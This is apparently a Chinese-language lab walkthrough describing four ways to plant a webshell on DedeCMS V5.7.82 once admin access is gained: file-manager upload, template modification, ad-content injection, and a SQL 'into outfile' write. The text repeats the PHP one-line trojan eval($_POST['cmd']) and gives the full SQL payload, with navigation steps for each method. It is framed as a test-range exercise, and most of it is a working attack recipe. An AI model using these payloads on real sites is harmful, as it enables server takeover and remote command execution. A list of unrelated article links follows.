DedeCMS-V5.7.82-UTF8织梦

先进行安装

然后进入首页和管理员后台 内容要在后台进行操作

首页

后台

1.通过文件管理器上传WebShell

访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshel

登陆到后台点击【核心】【文件式管理器】【文件上传】将准备好的一句话代

码上传

2.修改模板文件拿shell

点击模板 默认模板管理 index.html 然后点击修改

写入一句话木马<?php phpinfo();eval($_POST['cmd']);?>

然后保存

接着点击生成 更新主页HTML--》将主页位置修改为【../index.php】--》点击 【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化...

3.后台任意命令执行拿WebShell

<?php phpinfo();eval($_POST['cmd']);?>

步骤一:点击 【模块】 --》 【广告管理】--》〔【增加一个新广告】--》在【广告内容】 处添

加一句话代码--》点击 【确定】

步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!

拿蚁剑测试连接

4.SQL命令行

输入一句话木马

select "<?php phpinfo();eval($_POST['cmd']);?>" into outfile "D:/phpstudy_pro/WWW/uploads/shell.php"

相关推荐
IT技术图谱6 分钟前
【绝非标题党】网络监听新姿势:APT编译时注解实现高扩展框架
android·面试·架构
RichardLai8818 分钟前
[Flutter 基础] - Flutter基础组件 - Text
android·flutter
姜行运31 分钟前
数据结构【树和二叉树】
android·数据结构·算法·c#
东风西巷1 小时前
Control Center安卓版:自定义控制中心,提升手机操作体验
android·智能手机·性能优化·软件需求
布拉德很帅1 小时前
Android如何通过aspectj打造一个无侵入式动态权限申请框架
android
CYRUS_STUDIO2 小时前
Android 加壳应用运行流程 与 生命周期类处理方案
android·安全·逆向
隐-梵2 小时前
Android studio进阶开发(四)--okhttp的网络通信的使用
android·ide·okhttp·android studio
_一条咸鱼_2 小时前
Android大厂面试通关秘籍
android·面试·android jetpack
zhishishe4 小时前
2025 年免费 Word 转 PDF 转换器有哪些?
android·windows·pdf·电脑·word
Ya-Jun10 小时前
常用第三方库精讲:cached_network_image图片加载优化
android·flutter